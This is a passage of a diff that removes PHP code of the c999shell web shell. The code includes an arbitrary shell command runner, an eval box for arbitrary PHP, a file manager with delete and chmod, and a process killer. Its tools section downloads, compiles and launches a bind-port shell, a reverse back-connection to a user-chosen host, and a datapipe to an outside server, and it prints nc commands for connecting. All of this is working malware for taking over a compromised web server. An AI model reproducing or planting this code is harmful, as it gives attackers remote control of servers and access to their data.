-  $ret = str_replace("\r\n","\n",$ret);

-  $ret = explode("\n",$ret);

-  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}

-  foreach($sess_data["cut"] as $k=>$v)

-  {

-   if (in_array($v,$ret)) {fs_rmobj($v);}

-   unset($sess_data["cut"][$k]);

-  }

-  c999_sess_put($sess_data);

-  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}

-  $act = "ls";

- }

- elseif ($actpastebuff)

- {

-  $psterr = "";

-  foreach($sess_data["copy"] as $k=>$v)

-  {

-   $to = $d.basename($v);

-   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}

-   if ($copy_unset) {unset($sess_data["copy"][$k]);}

-  }

-  foreach($sess_data["cut"] as $k=>$v)

-  {

-   $to = $d.basename($v);

-   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}

-   unset($sess_data["cut"][$k]);

-  }

-  c999_sess_put($sess_data);

-  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}

-  $act = "ls";

- }

-}

-if ($act == "cmd")

-{

-if (trim($cmd) == "ps -aux") {$act = "processes";}

-elseif (trim($cmd) == "tasklist") {$act = "processes";}

-else

-{

- @chdir($chdir);

- if (!empty($submit))

- {

-  echo "<b>Result of execution this command</b>:<br>";

-  $olddir = realpath(".");

-  @chdir($d);

-  $ret = myshellexec($cmd);

-  $ret = convert_cyr_string($ret,"d","w");

-  if ($cmd_txt)

-  {

-   $rows = count(explode("\r\n",$ret))+1;

-   if ($rows < 10) {$rows = 10;}

-   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";

-  }

-  else {echo $ret."<br>";}

-  @chdir($olddir);

- }

- else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}

- echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";

-}

-}

-if ($act == "ls")

-{

- if (count($ls_arr) > 0) {$list = $ls_arr;}

- else

- {

-  $list = array();

-  if ($h = @opendir($d))

-  {

-   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}

-   closedir($h);

-  }

-  else {}

- }

- if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}

- else

- {

-  //Building array

-  $objects = array();

-  $vd = "f"; //Viewing mode

-  if ($vd == "f")

-  {

-   $objects["head"] = array();

-   $objects["folders"] = array();

-   $objects["links"] = array();

-   $objects["files"] = array();

-   foreach ($list as $v)

-   {

-    $o = basename($v);

-    $row = array();

-    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}

-    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}

-    elseif (is_dir($v))

-    {

-     if (is_link($v)) {$type = "LINK";}

-     else {$type = "DIR";}

-     $row[] = $v;

-     $row[] = $type;

-    }

-    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}

-    $row[] = filemtime($v);

-    if (!$win)

-    {

-     $ow = posix_getpwuid(fileowner($v));

-     $gr = posix_getgrgid(filegroup($v));

-     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));

-    }

-    $row[] = fileperms($v);

-    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}

-    elseif (is_link($v)) {$objects["links"][] = $row;}

-    elseif (is_dir($v)) {$objects["folders"][] = $row;}

-    elseif (is_file($v)) {$objects["files"][] = $row;}

-    $i++;

-   }

-   $row = array();

-   $row[] = "<b>Name</b>";

-   $row[] = "<b>Size</b>";

-   $row[] = "<b>Modify</b>";

-   if (!$win)

-  {$row[] = "<b>Owner/Group</b>";}

-   $row[] = "<b>Perms</b>";

-   $row[] = "<b>Action</b>";

-   $parsesort = parsesort($sort);

-   $sort = $parsesort[0].$parsesort[1];

-   $k = $parsesort[0];

-   if ($parsesort[1] != "a") {$parsesort[1] = "d";}

-   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";

-   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";

-   $row[$k] .= $y;

-   for($i=0;$i<count($row)-1;$i++)

-   {

-    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}

-   }

-   $v = $parsesort[0];

-   usort($objects["folders"], "tabsort");

-   usort($objects["links"], "tabsort");

-   usort($objects["files"], "tabsort");

-   if ($parsesort[1] == "d")

-   {

-    $objects["folders"] = array_reverse($objects["folders"]);

-    $objects["files"] = array_reverse($objects["files"]);

-   }

-   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);

-   $tab = array();

-   $tab["cols"] = array($row);

-   $tab["head"] = array();

-   $tab["folders"] = array();

-   $tab["links"] = array();

-   $tab["files"] = array();

-   $i = 0;

-   foreach ($objects as $a)

-   {

-    $v = $a[0];

-    $o = basename($v);

-    $dir = dirname($v);

-    if ($disp_fullpath) {$disppath = $v;}

-    else {$disppath = $o;}

-    $disppath = str2mini($disppath,60);

-    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}

-    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}

-    foreach ($regxp_highlight as $r)

-    {

-     if (ereg($r[0],$o))

-     {

-      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c999shexit();}

-      else

-      {

-       $r[1] = round($r[1]);

-       $isdir = is_dir($v);

-       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))

-       {

-        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}

-        $disppath = $r[2].$disppath.$r[3];

-        if ($r[4]) {break;}

-       }

-      }

-     }

-    }

-    $uo = urlencode($o);

-    $ud = urlencode($dir);

-    $uv = urlencode($v);

-    $row = array();

-    if ($o == ".")

-    {

-     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";

-     $row[] = "LINK";

-    }

-    elseif ($o == "..")

-    {

-     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";

-     $row[] = "LINK";

-    }

-    elseif (is_dir($v))

-    {

-     if (is_link($v))

-     {

-      $disppath .= " => ".readlink($v);

-      $type = "LINK";

-      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";

-     }

-     else

-     {

-      $type = "DIR";

-      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";

-      }

-     $row[] = $type;

-    }

-    elseif(is_file($v))

-    {

-     $ext = explode(".",$o);

-     $c = count($ext)-1;

-     $ext = $ext[$c];

-     $ext = strtolower($ext);

-     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";

-     $row[] = view_size($a[1]);

-    }

-    $row[] = date("d.m.Y H:i:s",$a[2]);

-    if (!$win) {$row[] = $a[3];}

-    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";

-    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}

-    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}

-    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}

-    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}

-    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}

-    elseif (is_link($v)) {$tab["links"][] = $row;}

-    elseif (is_dir($v)) {$tab["folders"][] = $row;}

-    elseif (is_file($v)) {$tab["files"][] = $row;}

-    $i++;

-   }

-  }

-  // Compiling table

-  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);

-  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";

-  foreach($table as $row)

-  {

-   echo "<tr>\r\n";

-   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}

-   echo "</tr>\r\n";

-  }

-  echo "</table><hr size=\"1\" noshade><p align=\"right\">

-  <script>

-  function ls_setcheckboxall(status)

-  {

-   var id = 1;

-   var num = ".(count($table)-2).";

-   while (id <= num)

-   {

-    document.getElementById('actbox'+id).checked = status;

-    id++;

-   }

-  }

-  function ls_reverse_all()

-  {

-   var id = 1;

-   var num = ".(count($table)-2).";

-   while (id <= num)

-   {

-    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;

-    id++;

-   }

-  }

-  </script>

-  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 

-  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";

-  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))

-  {

-   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";

-  }

-  echo "<select name=act><option value=\"".$act."\">With selected:</option>";

-  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";

-  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";

-  if ($usefsbuff)

-  {

-   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";

-   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";

-   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";

-  }

-  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";

-  echo "</form>";

- }

-}

-if ($act == "tools")

-{

- $bndportsrcs = array(

-  "c999sh_bindport.pl"=>array("Using PERL","perl %path %port"),

-  "c999sh_bindport.c"=>array("Using C","%path %port %pass")

- );

- $bcsrcs = array(

-  "c999sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),

-  "c999sh_backconn.c"=>array("Using C","%path %host %port")

- );

- $dpsrcs = array(

-  "c999sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),

-  "c999sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")

- );

- if (!is_array($bind)) {$bind = array();}

- if (!is_array($bc)) {$bc = array();}

- if (!is_array($datapipe)) {$datapipe = array();}

- 

- if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}

- if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}

-  

- if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}

- if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}

- 

- if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}

- if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}

- if (!empty($bindsubmit))

- {

-  echo "<b>Result of binding port:</b><br>";

-  $v = $bndportsrcs[$bind["src"]];

-  if (empty($v)) {echo "Unknown file!<br>";}

-  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}

-  else

-  {

-   $w = explode(".",$bind["src"]);

-   $ext = $w[count($w)-1];

-   unset($w[count($w)-1]);

-   $srcpath = join(".",$w).".".rand(0,999).".".$ext;

-   $binpath = $tmpdir.join(".",$w).rand(0,999);

-   if ($ext == "pl") {$binpath = $srcpath;}

-   @unlink($srcpath);

-   $fp = fopen($srcpath,"ab+");

-   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}

-   elseif (!$data = c999getsource($bind["src"])) {echo "Can't download sources!";}

-   else

-   {

-    fwrite($fp,$data,strlen($data));

-    fclose($fp);

-    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}

-    $v[1] = str_replace("%path",$binpath,$v[1]);

-    $v[1] = str_replace("%port",$bind["port"],$v[1]);

-    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);

-    $v[1] = str_replace("//","/",$v[1]);

-    $retbind = myshellexec($v[1]." > /dev/null &");

-    sleep(5);

-    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);

-    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}

-    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}

-   }

-   echo "<br>";

-  }

- }

- if (!empty($bcsubmit))

- {

-  echo "<b>Result of back connection:</b><br>";

-  $v = $bcsrcs[$bc["src"]];

-  if (empty($v)) {echo "Unknown file!<br>";}

-  else

-  {

-   $w = explode(".",$bc["src"]);

-   $ext = $w[count($w)-1];

-   unset($w[count($w)-1]);

-   $srcpath = join(".",$w).".".rand(0,999).".".$ext;

-   $binpath = $tmpdir.join(".",$w).rand(0,999);

-   if ($ext == "pl") {$binpath = $srcpath;}

-   @unlink($srcpath);

-   $fp = fopen($srcpath,"ab+");

-   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}

-   elseif (!$data = c999getsource($bc["src"])) {echo "Can't download sources!";}

-   else

-   {

-    fwrite($fp,$data,strlen($data));

-    fclose($fp);

-    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}

-    $v[1] = str_replace("%path",$binpath,$v[1]);

-    $v[1] = str_replace("%host",$bc["host"],$v[1]);

-    $v[1] = str_replace("%port",$bc["port"],$v[1]);

-    $v[1] = str_replace("//","/",$v[1]);

-    $retbind = myshellexec($v[1]." > /dev/null &");

-    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";

-   }

-  }

- }

- if (!empty($dpsubmit))

- {

-  echo "<b>Result of datapipe-running:</b><br>";

-  $v = $dpsrcs[$datapipe["src"]];

-  if (empty($v)) {echo "Unknown file!<br>";}

-  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}

-  else

-  {

-   $srcpath = $tmpdir.$datapipe["src"];

-   $w = explode(".",$datapipe["src"]);

-   $ext = $w[count($w)-1];

-   unset($w[count($w)-1]);

-   $srcpath = join(".",$w).".".rand(0,999).".".$ext;

-   $binpath = $tmpdir.join(".",$w).rand(0,999);

-   if ($ext == "pl") {$binpath = $srcpath;}

-   @unlink($srcpath);

-   $fp = fopen($srcpath,"ab+");

-   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}

-   elseif (!$data = c999getsource($datapipe["src"])) {echo "Can't download sources!";}

-   else

-   {

-    fwrite($fp,$data,strlen($data));

-    fclose($fp);

-    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}

-    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);

-    $v[1] = str_replace("%path",$binpath,$v[1]);

-    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);

-    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);

-    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);

-    $v[1] = str_replace("//","/",$v[1]);

-    $retbind = myshellexec($v[1]." > /dev/null &");

-    sleep(5);

-    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);

-    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}

-    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}

-   }

-   echo "<br>";

-  }

- }

- ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php

- foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}

- ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>

-<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php

-foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}

-?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>

-Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>

-<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php

-foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}

-?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php

-}

-if ($act == "processes")

-{

- echo "<b>Processes:</b><br>";

- if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}

- else {$handler = "tasklist";}

- $ret = myshellexec($handler);

- if (!$ret) {echo "Can't execute \"".$handler."\"!";}

- else

- {

-  if (empty($processes_sort)) {$processes_sort = $sort_default;}

-  $parsesort = parsesort($processes_sort);

-  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}

-  $k = $parsesort[0];

-  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}

-  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}

-  $ret = htmlspecialchars($ret);

-  if (!$win)

-  {

-   if ($pid)

-   {

-    if (is_null($sig)) {$sig = 9;}

-    echo "Sending signal ".$sig." to #".$pid."... ";

-    if (posix_kill($pid,$sig)) {echo "OK.";}

-    else {echo "ERROR.";}

-   }

-   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}

-   $stack = explode("\n",$ret);

-   $head = explode(" ",$stack[0]);

-   unset($stack[0]);

-   for($i=0;$i<count($head);$i++)

-   {

-    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}

-   }

-   $prcs = array();

-   foreach ($stack as $line)

-   {

-    if (!empty($line))

-{

- echo "<tr>";

-     $line = explode(" ",$line);

-     $line[10] = join(" ",array_slice($line,10));

-     $line = array_slice($line,0,11);

-     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}

-     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";

-     $prcs[] = $line;

-     echo "</tr>";

-    }

-   }

-  }

-  else

-  {

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}

-   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}

-   $ret = convert_cyr_string($ret,"d","w");

-   $stack = explode("\n",$ret);

-   unset($stack[0],$stack[2]);

-   $stack = array_values($stack);

-   $head = explode("",$stack[0]);

-   $head[1] = explode(" ",$head[1]);

-   $head[1] = $head[1][0];

-   $stack = array_slice($stack,1);

-   unset($head[2]);

-   $head = array_values($head);

-   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}

-   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}

-   if ($k > count($head)) {$k = count($head)-1;}

-   for($i=0;$i<count($head);$i++)

-   {

-    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}

-   }

-   $prcs = array();

-   foreach ($stack as $line)

-   {

-    if (!empty($line))

-    {

-     echo "<tr>";

-     $line = explode("",$line);

-     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);

-     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 

-     $prcs[] = $line;

-     echo "</tr>";

-    }

-   }

-  }

-  $head[$k] = "<b>".$head[$k]."</b>".$y;

-  $v = $processes_sort[0];

-  usort($prcs,"tabsort");

-  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}

-  $tab = array();

-  $tab[] = $head;

-  $tab = array_merge($tab,$prcs);

-  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";

-  foreach($tab as $i=>$k)

-  {

-   echo "<tr>";

-   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}

-   echo "</tr>";

-  }

-  echo "</table>";

- }

-}

-if ($act == "eval")

-{

- if (!empty($eval))

- {

-  echo "<b>Result of execution this PHP-code</b>:<br>";

-  $tmp = ob_get_contents();

-  $olddir = realpath(".");

-  @chdir($d);

-  if ($tmp)

-  {

-   ob_clean();

-   eval($eval);

-   $ret = ob_get_contents();

-   $ret = convert_cyr_string($ret,"d","w");

-   ob_clean();

-   echo $tmp;

-   if ($eval_txt)

-   {

-    $rows = count(explode("\r\n",$ret))+1;

-    if ($rows < 10) {$rows = 10;}

-    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";

-   }

-   else {echo $ret."<br>";}

-  }

-  else

-  {

-   if ($eval_txt)

-   {

-    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";

-    eval($eval);

-    echo "</textarea>";

-   }

-   else {echo $ret;}

-  }

-  @chdir($olddir);

- }

- else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}

- echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";

-}

-if ($act == "f")

-{

- if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")

- {

-  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}

-  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}

- }

- else

- {

-  $r = @file_get_contents($d.$f);

-  $ext = explode(".",$f);

-  $c = count($ext)-1;

-  $ext = $ext[$c];

-  $ext = strtolower($ext);

-  $rft = "";

-  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}

-  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}

-  if (empty($ft)) {$ft = $rft;}

-  $arr = array(

-   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),

-   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),

-   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),

-   array("Code","code"),

-   array("Session","phpsess"),

-   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),

-   array("SDB","sdb"),

-   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),

-   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),

-   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),

-   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),

-   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")

-  );

-  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";

-  foreach($arr as $t)

-  {

-   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}

-   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}

-   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}

